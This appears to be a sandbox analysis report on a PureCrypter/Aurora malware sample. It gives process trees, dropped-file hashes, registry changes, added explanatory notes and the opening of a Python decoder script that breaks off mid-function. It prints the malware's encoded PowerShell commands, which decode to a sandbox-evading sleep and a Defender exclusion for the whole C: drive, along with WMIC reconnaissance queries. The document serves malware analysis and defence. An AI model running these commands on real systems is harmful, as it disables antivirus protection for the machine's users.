Analysis Overview
SHA256
471d501162e2a5cb6aab3f4f5362ff843d05ef9f20d9fd7ea29733d3a9875747
Threat Level: Known bad
The file 5e243f79ecb539d0d1f75fce7ddfedeccee70a48 was found to be: Known bad.
Malicious Activity Summary
PureCrypter
Aurora
Detect PureCrypter injector
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-02-05 13:37
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-02-05 13:37
Reported
2023-02-05 13:40
Platform
win7-20220901-en
Max time kernel
91s
Max time network
50s
Command Line
Signatures
Detect PureCrypter injector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
PureCrypter
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
Adds Run key to start application
Note: the IXP000.TMP extraction directory and the RunOnce value wextract_cleanup0 (rundll32 advpack.dll,DelNodeRunDLL32 on that directory) are the standard artifacts of a Windows IExpress/wextract self-extracting package. The value only deletes the temporary extraction directory at the next logon; it does not persist the payload. The outer sample is therefore an SFX wrapper around voiceadequovl.exe, and this report records no Run key for the copy dropped to AppData\Roaming\Voice.
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe
"C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
"C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
Network
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | 6beb8a3521d42c8beb6f6a762780fbd8 |
| SHA1 | 98839d0503a2a772cfe3a84046fa1948040f5dac |
| SHA256 | 88f8fb7d596afd14c206da369ef92549be1f2afe9e3e090f527834a532ce10a8 |
| SHA512 | 37a1910df19bf5b44358e26132f70c50b7dd7cf2fdb95979b52c08ee756e88defe496a22d3242316570d8fcbe09fbee021cd77c1f44a38371a3872fcc0952dbb |
memory/1280-54-0x0000000000000000-mapping.dmp
memory/1280-56-0x00000000752B1000-0x00000000752B3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | 1ade2ffb0cb99195001374eb9291869f |
| SHA1 | 136f8615094920c993f88e0e17a7e7e3a37ade8e |
| SHA256 | 3d6d4d770fd2611dafe3e6b2c00e86b167180a8429a065d0283a432f6c4f18de |
| SHA512 | d7b054e8dbc713d82a427b5556fa3ae48309dddde8d678c80a5dfdfc1125dc61d8c53f205a9dfe6e4d4a184f4c1df0b121afc19acb3260c01549829769161698 |
\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | effb7be7cd75b6362ed732e39e53740a |
| SHA1 | 434b758102cc35a27aa4836d8cca07374b64f4ee |
| SHA256 | cb34917a365e48fbc033108162287c96e43d133a0ee7a2b6b2375a6d8f4b4ffc |
| SHA512 | 167a973494e96139aa6ffd15d12eaf9fdc70f26cae0b3531979ab54e7aec7701b4fe358c516173a18db0eeeef258171c86ec9bc6e5e903717430c2c26e147d08 |
\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 5a0aa6da9c83bbc3bb0b0e3f129d9b63 |
| SHA1 | 347aacde3260377cac72ac2ab376df194db49bd7 |
| SHA256 | 73de6d55bb5252a701113265d37d4cee4905f0f7316bbf38cd9745b7ebe99c24 |
| SHA512 | 0adfdd98f72a8c76d3109ad0e535862cbe3b3387174b3480b2f0e75e8699220610ba6013620d9c513de6c36e684b807b91257ef5b850c2c49f668ab4cd7812e3 |
\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | e4f67f9abbc0bbd859f79230d61b0579 |
| SHA1 | 8fbaee4e938b53526aac6150cef1a5a56e5e5e47 |
| SHA256 | b46a281d150cd6ea252e2bb513ea9534009df0e453248643c3fd5da9b1a2cb45 |
| SHA512 | dc54228c61d66d1979e8d4daf5fca6cd319d73595655d84fdd41f4b51202ccb6fa0e67952230db806ce07d2de33459794fdf5ff0628414c5efc21022572361c7 |
\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 385383ea7afaff46236860d95629baa5 |
| SHA1 | 426a56190240839927ff876899cad2a7e04723d8 |
| SHA256 | 2ffb9a0d0f716e530b9bd8969cfac6696a4ac918cc075ad401d04cbc0204d1ad |
| SHA512 | ac711ee4f86826f5f8b2750545730c452d2e506e84c3e0093bf0d8f1b2e7614165499ba8768996e97068a8aae21d2840ec7184bc92fdf239eb757642e0747417 |
memory/1736-62-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | b17da03ddd2274ee483d704fc8b46f15 |
| SHA1 | ff707f4902bb5bccbcae5a258d10264894a9acdb |
| SHA256 | 711aa5c4d56489c41457a07b1e4c4003e030cd709822d0a351f22be4a05f6db5 |
| SHA512 | 4429322dbc8fcb6e49df9412f49a1bf82a385a91c15b48c0d60360d1edd44ccd710dedcb7f20e355a96f109e346d8db9fbf44c5edb7a6eee36ed9ecb7ed1b97d |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 0f89683cd243fde623430fd6351b8069 |
| SHA1 | 673dba0d57175d904bf012615c748de3a79988ce |
| SHA256 | df8274a6f1e5252bb7f4a4bcd3706367b03d857c62d1e14556e192aeda689d7f |
| SHA512 | d04188113380f66f084a94bb0213edba99e3f02e168dc99cbd531d76348a7311a838031a4f1e101e6735b70f4932d72a4dbe1e1fbe2021b721be3335be423937 |
memory/1736-65-0x0000000000200000-0x0000000000974000-memory.dmp
memory/1736-66-0x00000000064A0000-0x0000000006840000-memory.dmp
memory/1068-67-0x0000000000000000-mapping.dmp
memory/1068-69-0x000000006F1A0000-0x000000006F74B000-memory.dmp
memory/1068-70-0x000000006F1A0000-0x000000006F74B000-memory.dmp
memory/1068-71-0x000000006F1A0000-0x000000006F74B000-memory.dmp
memory/1104-72-0x0000000000000000-mapping.dmp
memory/1736-73-0x00000000052F0000-0x0000000005462000-memory.dmp
memory/1872-74-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | e8d4cc4e6b5546ce9b43d7a979d89697 |
| SHA1 | cb20e061fada675881729e6feaa945ac4a05d0ad |
| SHA256 | edef89087834afb9753aaded4b85bb4ba25a7a6b2f702325d67ab0b511384cc9 |
| SHA512 | 3385cf1a731f164a8f52753a9a59fde9694a216ef88fc87339a6455349bf4b7642275333291a92168f6cf32d8ca829329603d2f4649b127e4dca0b63187366b7 |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 5ac8b18822f868443c4115c89340396a |
| SHA1 | a568a9cb518796d5d4cc36dfcbeda74b5cc32077 |
| SHA256 | e4dc0df4595a843cba9e988883b2328130da400978d76b38bf4701951a1a411c |
| SHA512 | 6b06fc89f3eabc44eb240f379b47896189ca1201f70dfd9f1b6523b272b2f70d5e0923f603822187ef6dc16bdadb039baac9b488242b8d331d159d7641a3a571 |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | f51807b8e4976fea474fff83e524c7d2 |
| SHA1 | 42dc7ccfe7f06d116c4208c52218a1d6e9da9900 |
| SHA256 | 4d0a0bcbe6abc2776f03f5f0817f9a897a6bf5015a71db5661da2dbb7009b989 |
| SHA512 | b3e7e45f7a2ef72660ae190b36244cf2ff52bb6a3a0e8d4d19ffad7a85bb97a39892511b3d5df238b33d7f1909533d5ca3aff04a455f7c0328edfea67bf9681c |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 46ff12adc736e041b7adc128256734d4 |
| SHA1 | 2b3f7800a64adb43356feadd679e0be91971fede |
| SHA256 | 3536424f26f49f71259efe4698eb7af9b84bcac3f288126564586e84137c31aa |
| SHA512 | ee05425034a8a6e4799fe742eb507a346186eb13b8b3fc9285b9713af25bf1b5519758404421fbbe5418903bccb5f2b19248adbb3ecc6d556dff489477a8f687 |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 5a1da2d0b85e6dfa46a0ccc674b3f550 |
| SHA1 | 6d3d0aa221aacbb1ec65b216bb22f11fe21ac1e7 |
| SHA256 | f64fc17ed57562eff792891813c0696f8c076675d2a9d3c893f030a28ec298b1 |
| SHA512 | 72746bf90f68f05f0796d5b3f0edf962b88ecec07895a0505ea969479a43b171b12ac4da33fb66574decff6d6bef8748baa9b188a129ce668c9be08152a1c89c |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 37f82d88e091ff26f266eebe25aa11b2 |
| SHA1 | 90f77ffa04a64e992b1e56c11bb05c492da2114e |
| SHA256 | 39b7e76f49c90bea30e0d0f69e24755a40555566a9c683b108ce4028088a7613 |
| SHA512 | cd47fccc89f96ec75bd0ac6a3f0e308d01ec8127afdc8485b607acf918c4cce2d17b462f049bb0d2fc3266c62d9bbd97d7013f58bbe5208619162270691d15ff |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 3cc12ec8f264ea2cf669599ed2c0a392 |
| SHA1 | 8bcccb8895d03955244695e86bc7f4603d4a1f5f |
| SHA256 | af456192dfc0082b60e09542ab13050b032a0e406e7741c0ea4852d011c9939c |
| SHA512 | 12b1a575a63568c45fc1077def0e68b7585edb29fd9910c4f7eef2d4c4cecc3c90c7bfaac250f08363d3ff728808d4bc2ee6980c753fdd207da3f82a2dbe3120 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 45022d9c99bc520b38a26ff9078e46be |
| SHA1 | b326e8b4e221ef93159043671395d635c7967d01 |
| SHA256 | 9c804d7c3806186b2638218a27d926e9e0c624910428bee12daf2cd482709128 |
| SHA512 | d2bf0aef6271e4c2b2a1240b367f40561fcfc21b0588c91e37f63d50662845333de6f57af81d35687a3a5ee09b1ac874e58c548c3b2bec892e43c8db72f3feae |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 5bb3714360c25b80651018c798ee2bf4 |
| SHA1 | bd1b213f29acf1d3b5252ff8da9da4688de1f78d |
| SHA256 | f8737b1da17e9c489fb9d7ca38f67b02e7a75cc46ce8953e61f85f6d95df42d5 |
| SHA512 | 115c9d4b73978cc3d749353ef6cc68bf6a6bade27b89d50f63a90cc703b11ebe4bf35da42a063f117f0d8c987bd5ea9ad0960331fab495b2be98e2009755087d |
memory/1872-87-0x000000006F160000-0x000000006F70B000-memory.dmp
memory/1872-88-0x000000006F160000-0x000000006F70B000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-02-05 13:37
Reported
2023-02-05 13:40
Platform
win10v2004-20220812-en
Max time kernel
131s
Max time network
151s
Command Line
Signatures
Aurora
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5008 set thread context of 1128 | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Note: the wmic.exe rows below are WMIC's normal startup behaviour of enabling every privilege already present in its token; they accompany any WMIC query and are not evidence of escalation. The entries worth acting on are SeDebugPrivilege enabled by voiceadequovl.exe and by the two powershell.exe instances. Tokens 33 to 36 are privilege LUIDs the sandbox did not resolve to names: SeIncreaseWorkingSetPrivilege (33), SeTimeZonePrivilege (34), SeCreateSymbolicLinkPrivilege (35) and SeDelegateSessionUserImpersonatePrivilege (36).
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe
"C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
"C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic os get Caption
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic path win32_VideoController get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic cpu get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic cpu get name
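The two PowerShell -ENC blobs in this process list (the same two appear in behavioral1) are base64 of UTF-16LE text and decode to `start-sleep -seconds 35` and `set-mppreference -exclusionpath C:\`: a 35-second delay to outlast short analysis timeouts, then a Microsoft Defender exclusion for the whole system drive, followed by WMIC queries for the OS caption, GPU and CPU. The script below is an added example, not part of this report or of any sandbox tooling: it decodes such command lines and tags them with labels of its own. The rule names, regexes and the ATT&CK reference in the comments are the example's assumptions; the input is the behavioral2 process list copied from above.

```python
"""Decode PowerShell -EncodedCommand payloads and tag the behaviours seen in
this report's process list. Added example for this page; the rule names,
regexes and tags are the example's own, not the sandbox's signatures."""
import base64
import re

# Constructed input: command lines copied from the behavioral2 Processes section.
REPORT_CMDLINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe"',
    r'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe',
    r'"C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe"',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==',
    r'"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==',
    r'powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==',
    r'wmic os get Caption',
    r'cmd /C "wmic path win32_VideoController get name"',
    r'wmic path win32_VideoController get name',
    r'cmd /C "wmic cpu get name"',
    r'wmic cpu get name',
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match "-e<letters> <base64>" and then check the letters prefix "encodedcommand".
_ENC_FLAG_RE = re.compile(r'(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)', re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the script carried by -EncodedCommand, or None if there is none.
    The blob is base64 of UTF-16LE text, which is why every other byte is 0x00."""
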